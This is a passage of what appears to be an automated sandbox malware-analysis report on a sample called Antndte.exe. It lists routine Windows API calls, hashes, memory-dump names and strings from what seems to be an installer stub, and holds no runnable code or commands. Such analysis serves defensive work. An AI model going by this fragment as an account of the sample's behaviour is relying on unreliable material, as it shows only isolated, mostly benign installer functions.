                                                                                                                                • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406025
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00406036
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603D
                                                                                                                                  • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Antndte.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                                                                                  • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                • String ID: %ls=%ls$[Rename]
                                                                                                                                • API String ID: 2171350718-461813615
                                                                                                                                • Opcode ID: e9e028425c837c753a03fdef0a01934527d0e92a4020d6044e6bdb5cca473c88
                                                                                                                                • Instruction ID: 79e357045524b81a8ea21183b2a6189fe473d9766cb3db532b5e95eed637b89f
                                                                                                                                • Opcode Fuzzy Hash: e9e028425c837c753a03fdef0a01934527d0e92a4020d6044e6bdb5cca473c88
                                                                                                                                • Instruction Fuzzy Hash: D1315771100B05ABD220AB669D48F6B3A9CDF45744F15003FF902F62D2EA7CD9118ABC
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Antndte.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                                                                                                • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Antndte.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                                                                                                • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Antndte.exe",0040334E,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                • String ID: "C:\Users\user\Desktop\Antndte.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 589700163-3580493748
                                                                                                                                • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                                                                                • Instruction ID: 662237d401549a0b86d5a4e6e01ff77a7750504751085e1aca306c60b5ffe750
                                                                                                                                • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                                                                                • Instruction Fuzzy Hash: 3911B655800612A5D7303B18BC40AB776B8EF68750B52403FED8A732C5E77C5CA286BD
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040429B
                                                                                                                                • GetSysColor.USER32(00000000), ref: 004042B7
                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004042C3
                                                                                                                                • SetBkMode.GDI32(?,?), ref: 004042CF
                                                                                                                                • GetSysColor.USER32(?), ref: 004042E2
                                                                                                                                • SetBkColor.GDI32(?,?), ref: 004042F2
                                                                                                                                • DeleteObject.GDI32(?), ref: 0040430C
                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404316
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                                                                • Instruction ID: b3876bbcbbff373df079470ccdc5149205509338ab7e68b668f4883140def8c6
                                                                                                                                • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                                                                • Instruction Fuzzy Hash: B22151B1600704ABCB219F68DE08B5BBBF8AF41714F04897DFD96E26A0D734E944CB64
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026EB
                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 0040270E
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 00402724
                                                                                                                                  • Part of subcall function 00405E55: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405E6B
                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                • String ID: 9
                                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                                • Opcode ID: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                                                                                                • Instruction ID: 4c47c5b6e7001fd487639b42c981b506dedcea616f9f6d447a3608767ea6fa5a
                                                                                                                                • Opcode Fuzzy Hash: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                                                                                                • Instruction Fuzzy Hash: 8351E575D1021AABDF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BCB
                                                                                                                                • GetMessagePos.USER32 ref: 00404BD3
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404BED
                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFF
                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C25
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                • String ID: f
                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                • Instruction ID: fcc096391eddebe8eb85a5aa76d4b30f922b4a39187f2a8acbab72006efdbce5
                                                                                                                                • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                • Instruction Fuzzy Hash: 31015E71900218BAEB10DB94DD85BFEBBBCAF95B11F10412BBA50B62D0D7B499418BA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DF5
                                                                                                                                • MulDiv.KERNEL32(00055363,00000064,00055567), ref: 00402E20
                                                                                                                                • wsprintfW.USER32 ref: 00402E30
                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                                                                                                Strings
                                                                                                                                • verifying installer: %d%%, xrefs: 00402E2A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                • Opcode ID: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                                                                                                • Instruction ID: 0244175548504e0de7267acb57bf05e9e9b1595e8d7e84e5cb6d98a661a40fbb
                                                                                                                                • Opcode Fuzzy Hash: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                                                                                                • Instruction Fuzzy Hash: B6014470640208BBDF209F50DE49FAA3B69BB00304F008039FA46A51D0DBB889558B59
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 1000256D
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                                                • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                                                                                                • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                                                • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00402950
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2667972263-0
                                                                                                                                • Opcode ID: aad64d17865b04e2c8dbcb80c558165cdbd4c1765d3987868adc6cabe38a073c
                                                                                                                                • Instruction ID: c7dec26b55dd312fec5fb3faf1598927ec34475db9096b9e5e75d52a628400f5
                                                                                                                                • Opcode Fuzzy Hash: aad64d17865b04e2c8dbcb80c558165cdbd4c1765d3987868adc6cabe38a073c
                                                                                                                                • Instruction Fuzzy Hash: E521BDB1C00128BBDF216FA5DE49D9E7E79EF08364F10423AF964762E0CB794C418B98
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsm118D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsm118D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiWidelstrlen
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsm118D.tmp$C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll
                                                                                                                                • API String ID: 3109718747-4113893760
                                                                                                                                • Opcode ID: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                                                                                                • Instruction ID: 59cf546ef3811be8ee7c727c8e5eea11e2141b44b9e391d5d171073bbb1e77e0
                                                                                                                                • Opcode Fuzzy Hash: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                                                                                                • Instruction Fuzzy Hash: F611EB72A01204BEDB146FB18E8EA9F77659F45398F20453BF102F61C1DAFC89415B5E
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                                                                                  • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4216380887-0
                                                                                                                                • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                                • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                                                                                                • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                                                • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • GetDC.USER32(?), ref: 00401DB6
                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                                                                                • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E38
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3808545654-0
                                                                                                                                • Opcode ID: 2436c958ee3071ddbde98fbfe31ca5aa93b36360e0cd4885b2b6d74d2be8512d
                                                                                                                                • Instruction ID: 8058adb7fc53f801c03006c9ef56a62efa99793a140a93f16ed6c143b7d909dc
                                                                                                                                • Opcode Fuzzy Hash: 2436c958ee3071ddbde98fbfe31ca5aa93b36360e0cd4885b2b6d74d2be8512d
                                                                                                                                • Instruction Fuzzy Hash: 9A015271944240EFE701ABB4AE8A6D97FB49F95301F10457EE241F61E2CAB800459F2D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1148316912-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                                                                                                • wsprintfW.USER32 ref: 00404B4C
                                                                                                                                • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,76D63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76D63420,00000000), ref: 00405C0C
                                                                                                                                • CharNextW.USER32(00000000), ref: 00405C11
                                                                                                                                • CharNextW.USER32(00000000), ref: 00405C29
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharNext
                                                                                                                                • String ID: C:\
                                                                                                                                • API String ID: 3213498283-3404278061
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405B75
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B53
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 2659869361-3355392842
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • DestroyWindow.USER32(00000000,00000000,0040303D,?,?,00000006,00000008,0000000A), ref: 00402E70
                                                                                                                                • GetTickCount.KERNEL32 ref: 00402E8E
                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • IsWindowVisible.USER32(?), ref: 00405289
                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004052DA
                                                                                                                                  • Part of subcall function 00404263: SendMessageW.USER32(000103CC,00000000,00000000,00000000), ref: 00404275
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                • Opcode ID: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                                                                                                • Instruction ID: e35359e86d41fb5d6968ee62a371e6abd11f03428b82ac61abb391d392e116c6
                                                                                                                                • Opcode Fuzzy Hash: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                                                                                                • Instruction Fuzzy Hash: 0E017131510609ABDF209F51DD84A5B3A25EF84754F5000BBFA04751D1C77A9C929E6E
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76D63420,004038D3,004036E9,00000006,?,00000006,00000008,0000000A), ref: 00403915
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 0040391C
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040390D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 1100898210-3355392842
                                                                                                                                • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                                                                • Instruction ID: e66732d9f8c7dde22b06ec40e1a6716a7c13e86cf839674f34118547447e98ef
                                                                                                                                • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                                                                • Instruction Fuzzy Hash: 95E012739019209BC6215F55ED08B5E7B68AF58B22F05447AE9807B26087B45C929BD8
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Antndte.exe,C:\Users\user\Desktop\Antndte.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BA5
